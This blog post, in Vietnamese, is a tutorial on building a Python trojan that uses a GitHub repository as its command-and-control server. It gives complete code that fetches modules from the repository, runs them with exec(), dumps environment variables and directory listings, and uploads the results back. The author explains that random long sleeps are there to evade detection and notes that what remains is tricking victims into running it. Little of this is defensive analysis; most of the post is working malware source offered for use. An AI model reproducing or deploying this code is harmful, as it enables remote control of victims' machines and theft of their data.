Post

How To Create Trojan Tool With Github

Learn how to create a Python-based Trojan tool that dynamically fetches and executes modules from a GitHub repository.

Posted Updated
Trojan Horse
Trojan Horse
By Bui Van Y
8 min read
How To Create Trojan Tool With Github

Introduction

Trojan (hay Trojan Horse – “con ngựa thành Troy”) là một loại phần mềm độc hại (malware) giả dạng phần mềm hợp pháp hoặc hữu ích để đánh lừa người dùng tải về và chạy nó. Khi được kích hoạt, Trojan có thể thực hiện nhiều hoạt động độc hại như:

  • Đánh cắp thông tin cá nhân (mật khẩu, tài khoản ngân hàng, dữ liệu cá nhân).
  • Tạo cửa hậu (backdoor) để tin tặc điều khiển máy tính từ xa.
  • Tự động tải xuống và cài đặt phần mềm độc hại khác.
  • Chiếm quyền kiểm soát thiết bị để thực hiện tấn công mạng.

How Trojan Works

Trojan không tự nhân bản như virus hay sâu máy tính (worm), mà thường lây lan thông qua:

  • Email lừa đảo chứa tệp đính kèm độc hại.
  • Phần mềm bẻ khóa (crack), keygen, game lậu có chứa mã độc.
  • Quảng cáo giả mạo trên web dẫn đến tải phần mềm độc hại.
  • USB hoặc thiết bị lưu trữ bên ngoài bị nhiễm Trojan.

Code Trojan with Github

1
2
3
4
5
6
7
8
9

bhptrojan
├── config
│   └── abc.json
├── data
├── git_trojan.py
├── modules
│   ├── dirlister.py
│   └── environment.py
└── my_token.txt

Module

1
2
3
4
5
6

import os

def run(**args):
    print("[*] In dirlister module.")
    files = os.listdir('.')
    return str(files)

1
2
3
4
5

import os

def run(**args):
    print("[*] In enviroment module.")
    return os.environ

Ở 2 module này đều có phương thức run để tiện cho việc gọi hàm, trả lại dữ liệu sau khi thực thi. Có thể thêm các module khác tùy ý.

Config

1
2
3
4
5
6
7
8

[
    {
        "module": "dirlister"
    },
    {
        "module": "environment"
    }
]

Config chứa tên các module cần chạy.

  • Sau khi tạo được modules và config, up lên Github repository.
  • git_trojan.py là file chạy chính của trojan, nó sẽ lấy danh sách các module cần chạy từ config và import các module từ modules.

Main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115

import base64
import github3
import github3.repos
import importlib.util
import json
import random
import sys
import threading
import time
from datetime import datetime
from github3.repos.contents import Contents

def github_connect(token_path='path_to_personal_access_token_file', owner='owner', repo='repo_name') -> github3.repos.Repository:
    """Connects to the GitHub repository."""
    with open(token_path) as f:
        token = f.read().strip()
    return github3.login(token=token).repository(owner, repo)

def get_file_content(dir_name, module_name, repo: github3.repos.Repository) -> bytes:
    """Fetch file content from GitHub repository."""
    file: Contents = repo.file_contents(f"{dir_name}/{module_name}")
    return file.decoded

class GitImporter:
    """Custom module loader to fetch and execute modules from GitHub."""
    def __init__(self, repo):
        self.current_module_code = ""
        self.repo = repo

    def find_module(self, name, path=None):
        print(f"[*] Attempting to retrieve {name}")
        try:
            new_lib = get_file_content('modules', f'{name}.py', self.repo)
            if new_lib:
                self.current_module_code = new_lib.decode('utf-8')  
                return self
        except Exception as e:
            print(f"[!] Error retrieving module {name}: {e}")
        return None

    def load_module(self, name):
        if name in sys.modules:
            return sys.modules[name]

        spec = importlib.util.spec_from_loader(name, loader=None)
        new_module = importlib.util.module_from_spec(spec)

        try:
            exec(self.current_module_code, new_module.__dict__)
        except SyntaxError as e:
            print(f"[!] Syntax error in module {name}: {e}")
            return None 

        sys.modules[name] = new_module
        return new_module

class Trojan:
    """Main Trojan class to manage module execution."""
    def __init__(self, id, repo):
        self.id = id
        self.config_file = f'{id}.json'
        self.data_path = f'data/{id}/'
        self.repo = repo

    def get_config(self):
        """Fetches the configuration file and imports required modules."""
        try:
            config_json = get_file_content('config', self.config_file, self.repo)
            config = json.loads(config_json)

            for task in config:
                if task['module'] not in sys.modules:
                    __import__(task['module']) 

            return config
        except Exception as e:
            print(f"[!] Error loading config: {e}")
            return []

    def module_runner(self, module):
        """Runs a specified module and stores the result."""
        try:
            result = sys.modules[module].run()
            self.store_module_result(result)
        except Exception as e:
            print(f"[!] Error running module {module}: {e}")

    def store_module_result(self, data):
        """Stores module execution results in the repository."""
        try:
            message = datetime.now().isoformat()
            remote_path = f'data/{self.id}/{message}.data'
            bindata = bytes('%r' % data, 'utf-8')
            self.repo.create_file(remote_path, message, base64.b64encode(bindata))
        except Exception as e:
            print(f"[!] Error storing result: {e}")

    def run(self):
        """Continuously fetches config and runs tasks."""
        while True:
            config = self.get_config()
            for task in config:
                threading.Thread(
                    target=self.module_runner,
                    args=(task['module'],)
                ).start()
                time.sleep(random.randint(1, 10))

            time.sleep(random.randint(30*60, 3*60*60))

repo = github_connect()

if __name__ == "__main__":
    sys.meta_path.append(GitImporter(repo))
    Trojan('abc', repo).run()

Explanation

1
2
3
4
5

def github_connect(token_path='path_to_personal_access_token_file', owner='owner', repo='repo_name') -> github3.repos.Repository:
    """Connects to the GitHub repository."""
    with open(token_path) as f:
        token = f.read().strip()
    return github3.login(token=token).repository(owner, repo)

Hàm này sử dụng github3 kết nối, xác thực với Github thông qua Persional Access Token, trả về Repository Object. Có thể thay thế token_path='path_to_personal_access_token_file' bằng token trực tiếp và bỏ phần đọc file.

1
2
3
4

def get_file_content(dir_name, module_name, repo: github3.repos.Repository) -> bytes:
    """Fetch file content from GitHub repository."""
    file: Contents = repo.file_contents(f"{dir_name}/{module_name}")
    return file.decoded

Hàm này đọc nội dung của 1 file thông qua Repository Object, trả về dữ liệu dạng bytes.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

class GitImporter:
    """Custom module loader to fetch and execute modules from GitHub."""
    def __init__(self, repo):
        self.current_module_code = ""
        self.repo = repo

    def find_module(self, name, path=None):
        print(f"[*] Attempting to retrieve {name}")
        try:
            new_lib = get_file_content('modules', f'{name}.py', self.repo)
            if new_lib:
                self.current_module_code = new_lib.decode('utf-8')  
                return self
        except Exception as e:
            print(f"[!] Error retrieving module {name}: {e}")
        return None

    def load_module(self, name):
        if name in sys.modules:
            return sys.modules[name]

        spec = importlib.util.spec_from_loader(name, loader=None)
        new_module = importlib.util.module_from_spec(spec)

        try:
            exec(self.current_module_code, new_module.__dict__)
        except SyntaxError as e:
            print(f"[!] Syntax error in module {name}: {e}")
            return None 

        sys.modules[name] = new_module
        return new_module

Khi import 1 module trong Python:

  • Python sẽ tìm kiếm module từ thư mục hệ thống hoặc các đường dẫn tùy chỉnh.
  • Nếu không tìm thấy, nó kiểm tra các loader tùy chỉnh trong sys.meta_path.
  • Nếu có loader có phương thức find_module(), Python gọi:
1

loader = GitImporter().find_module('my_remote_module')
  • name = "my_remote_module" được truyền tự động bởi Python. Tức, khi import 1 module mà nó không có sẵn thì name là tên của module không có sẵn đó.
  • Nếu find_module() trả về một đối tượng hợp lệ, Python sẽ gọi tiếp:
1

loader.load_module('my_remote_module')
  • name = "my_remote_module" lại được truyền vào load_module() tự động. Nhờ đó, dù không gọi load_module() trực tiếp, Python vẫn truyền vào name đúng.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

class Trojan:
    """Main Trojan class to manage module execution."""
    def __init__(self, id, repo):
        self.id = id
        self.config_file = f'{id}.json'
        self.data_path = f'data/{id}/'
        self.repo = repo

    def get_config(self):
        """Fetches the configuration file and imports required modules."""
        try:
            config_json = get_file_content('config', self.config_file, self.repo)
            config = json.loads(config_json)

            for task in config:
                if task['module'] not in sys.modules:
                    __import__(task['module']) 

            return config
        except Exception as e:
            print(f"[!] Error loading config: {e}")
            return []

    def module_runner(self, module):
        """Runs a specified module and stores the result."""
        try:
            result = sys.modules[module].run()
            self.store_module_result(result)
        except Exception as e:
            print(f"[!] Error running module {module}: {e}")

    def store_module_result(self, data):
        """Stores module execution results in the repository."""
        try:
            message = datetime.now().isoformat()
            remote_path = f'data/{self.id}/{message}.data'
            bindata = bytes('%r' % data, 'utf-8')
            self.repo.create_file(remote_path, message, base64.b64encode(bindata))
        except Exception as e:
            print(f"[!] Error storing result: {e}")

    def run(self):
        """Continuously fetches config and runs tasks."""
        while True:
            config = self.get_config()
            for task in config:
                threading.Thread(
                    target=self.module_runner,
                    args=(task['module'],)
                ).start()
                time.sleep(random.randint(1, 10))

            time.sleep(random.randint(30*60, 3*60*60))

1) Hàm get_config gọi đến get_file_content để lấy tên các module cần chạy trên Github Repository.

  • Khi lấy được danh sách các module thì nó sẽ import.
1

__import__(task['module'])
  • Chính từ dòng này, khi import mà không có module sẵn trên hệ thống cục bộ, Python sẽ tìm nạp module từ GitImportername được truyền từ tên các module này.

2) Hàm run sẽ thực hiện vòng lặp vô tận, sẽ ngủ 30’ đến 3h để hạn chế bị hệ thông phát hiện.

  • Cứ sau thời gian quy định như vậy, nó sẽ lấy module từ Github Repository và import.
  • Sau khi import, nó thực thi các module theo từ Thread, cứ cách 1 đến 10 giây sẽ thực hiện module tiếp theo. Hàm được chạy ở đây là module_runner
1

result = sys.modules[module].run()
  • module_runner sẽ chạy các module đã được import thông qua hàm run() đã được tạo trong mỗi module.
  • Sau khi có result của mỗi module, thực hiện store_module_result, up dữ liệu lên Github Repository.

Vấn đề còn lại là cách để người dùng mắc bẫy để thực thi và ẩn mình để không bị hệ thống phát hiện.

Cyber ​​Security, Tools
python trojan github tool
This post is licensed under CC BY 4.0 by the author.